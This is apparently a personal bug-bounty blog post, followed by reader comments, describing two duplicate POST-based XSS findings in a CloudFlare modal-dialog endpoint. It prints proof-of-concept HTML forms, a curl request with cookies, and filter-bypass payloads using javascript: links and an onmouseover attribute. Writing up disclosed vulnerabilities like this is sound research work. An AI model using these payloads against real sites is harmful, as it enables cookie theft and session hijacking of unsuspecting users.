#1 XSS
These are some of my duplicate vulnerabilities found. I just thought of sharing with you. Recently I found two POST XSS in CloudFlare and unfortunately I was not the first to report.
I found the first issue in the “Confirm Key Generator” dialog box.
Let’s have a closer look at the URL.
/ajax/model-dialog.htm
It seems like an XMLHttpRequest object is used in the server side it accept our POST request.
After playing around with “content=” parameter what I’ve noticed was that it filters all HTML tags except
<b></b> <p></p><A HREF=””>
Well as <A HREF> tag is not filtered we can easily execute JavaScript.
<A HREF=”javascript:alert(document.cookie);”>XSS</A>
So the proof of concept would be:
<html>
<!-- POC by Osanda -->
<body>
<form name="exploit" action="https://www.cloudflare.com/ajax/modal-dialog.html" method="POST">
<input type="hidden" name="type" value="default" />
<input type="hidden" name="content" value="Go to this link &lt;A HREF=&quot;javascript:prompt(&apos;XSS by Osanda&apos;);&quot;&gt;XSS&lt;/A&gt;" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>
We don’t need an authorized account to trigger XSS since the issue is in “model-dialog.htm”. Here is the Curl command
curl -i -s -k -X 'POST' \
-H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: https://www.cloudflare.com/my-account' \
-b '__cfduid=dcfb031f1436b2c98ee75cfda0b313f9b1395243158470; __utma=1.1850105675.1399902759.1399910158.1400126593.4; __utmz=1.1399902759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.7.10.1400126593; __utmc=1; vses2=9pvibldsqecve4b63ef9h13h75; __cf_effload=1' \
--data-binary $'type=default&content=Go to this link <A HREF=\"javascript:prompt(\'XSS by Osanda\');\">XSS</A>' \
'https://www.cloudflare.com/ajax/modal-dialog.html'
That is it Game Over 🙂
#2 XSS
The second XSS issue was in the “zoneupload” parameter in the “model-dialog.html” file. In the previous scenario all the HTML tags are truncated but in here instead they are converted into special chars. How to bypass this one? 😉
Well as usual “'() are not filtered 🙂
ABC" onmouseover="prompt('XSS by Osanda') ""
Here is the proof of concept:
<html>
<body>
<form action="https://www.cloudflare.com/ajax/modal-dialog.html" method="POST">
<input type="hidden" name="type" value="zoneupload" />
<input type="hidden" name="z" value="google.lk" />
<input type="hidden" name="target" value="ABC&quot; onmouseover=&quot;prompt(&apos;XSS by Osanda&apos;) &quot;&quot;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
So yeah here we go XSS again 😀
Bug hunting is not all about getting your name in hall of fames or receiving rewards or being the first to report. I just enjoy finding vulnerabilities and love to learn something new 🙂
Great brother !
I learn a lot of things with you thanks !
Great bro!
dude nice findings, and i like your wallpaper. wanna share?
Thanks! I’ll mail you shortly 🙂
wow, awesome bro.
Thanks for your marvelous posting! I actually enjoyed reading it, you
could be a great author.I will be sure to
bookmark your blog and will come back in the foreseeable future.
I want to encourage continue your great posts, have a nice morning!
was this ever fixed?
Its Amazing finding Sir.
Thanks mate 🙂
Wow nice
wow…aiye..